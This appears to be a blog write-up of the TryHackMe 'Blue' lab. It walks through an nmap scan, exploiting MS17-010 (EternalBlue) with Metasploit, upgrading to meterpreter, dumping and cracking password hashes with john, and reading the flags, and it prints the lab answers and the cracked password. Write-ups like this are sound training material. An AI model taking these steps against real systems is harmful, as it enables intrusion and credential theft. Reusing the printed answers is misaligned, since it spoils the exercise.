Open in app

Sign in

Write

Sign in

Blue TryHackMe Writeup/Walkthrough

Shivam Taneja
5 min readSep 19, 2022

In this TryHackME — Blue Writeup we will learn how a small blip in the system can get it hacked. The purpose of this blog is to demonstrate the steps to complete the blue. In this room, deploy & hack into a windows machine, leveraging common misconfigurations issues.

TryHackME — Blue Task 1: Recon

Basically, it’s an info-gathering part in which we need to collect info about open-ports, service-running, os, and their version.

Question 1: How many ports are open with a port number under 1000?

Solution: Step 1: Open ‘nmap’ tool and scan the ip to identify the open ports under 1000.

And I found 3-open ports under 1000.

Answer — 3

Question 2: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

Solution: Step 1: Run the vuln script by using Nmap to find the vulnerability.

It’s Vulnerable with ‘SMBv1 server ms17–010’.

Answer — ms17–010

TryHackME — Blue Task 2: Gain Access

This machine is vulnerable to ms17–010 Remote code execution vulnerability. Use Metasploit to exploit it.

Question 1: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Solution: Step 1: open Metasploit , and try to find the exploitation against ‘SMBv1 server ms17–010’. By using “search ms17–010” command.

I found this 4-exploit.

Step 2: Now I use the first exploit.

Answer — exploit/windows/smb/ms17_010_eternalblue

Question 2: Show options and set the one required value. What is the name of this value? (All caps for submission)

Solutions: Step 1: Check options by using the “show options “ command.

Step 2: Set rhosts 10.10.140.190 (Target IP) and press enter.

Answer — rhosts

Now it’s time to run the exploit by using “run” command.

NOTE: If you see a FAIL message to get the session then you need to Set lhost 10.10.112.79 (Your IP) and press enter.

After setting, the correct lhost and rhosts check again by using the “show options” command to confirm it. Then run again the exploit.

TryHackME — Blue Task 3: Escalate

After getting into the shell, background the shell by using “ctrl+z” command and

Upgrade it to meterpreter.

Question 1: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in Metasploit. What is the name of the post-module we will use? (Exact path, similar to the exploit we previously selected)

Solution: Step 1: use the command “search shell_to”

Step 2: Type command “use 0” to use it.

Answer — post/multi/manage/shell_to_meterpreter

Question 2: Select this (use MODULE_PATH). Show options, what option are we required to change?

Solution: Step 1: Type command “Sessions” to check all sessions I have.

Answer — Session

TryHackME — Blue Task 4: Cracking

In this task, we try to get the hash of the user password and crack it.

Question 1: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Solution: Step 1: Now is time to get the shell/cmd by using the “shell” command.

Step 2: Now get the hash by using “hashdump” command.

The non-default user is only Jon.

Answer — jon

Question 2: Copy this password hash to a file and research how to crack it. What is the cracked password?

Solution: Step 1: Now I save jon password hash in a file (jon.txt) and after that rename the file with jon.hash format to decode the hash and get the original password.

Step 2: Decode the hash by using the “john tool” and “rockyou.txt” wordlist.

Answer — alqfna22

TryHackME — Blue Task 5: Find flags!

When you get the shell successfully then you need to find the flag that is hidden in different directories of the target machine.

Question 1: Flag1? This flag can be found at the system root.

Solution: Step 1: Check hint and go on ‘c’ drive.

Step 2: Check directories by using the “dir” command. Then I see the flag1.txt file.

Step 3: Read the flag1.txt file by using the “cat” command.

Flag 1: — flag{access_the_machine}

Question 2: Flag2? This flag can be found at the location where passwords are stored within Windows.

Solution: Step 1: Check the hint and go to the ‘windows’ folder.

Step 2: Then go to the system32 folder by using the “cd system32” command.

Step 3: Then go to the config file.

Check the directory then you see flag2.txt.

Flag 2: — flag {sam_database_elevated_access}

TryHackMe — Windows Investigating CTF

Question 3: flag3: This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Solution :

Type command : Search -f flag*.txt .

After that you see the flag3.txt file, Then read it.

Flag 3: — flag{admin_documents_can_be_valuable}

Finally done….

NOTE: The eternal blue vulnerability was very famous and many systems were comprised using this vulnerability. Microsoft released a fix to patch up these vulnerabilities for different operating systems.

Tryhackme
Hacking
Privilege Escalation
Linux

--

--

Shivam Taneja

Written by Shivam Taneja

27 Followers

IT Security Consultant, Researcher, Penetration Tester & Hacker.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams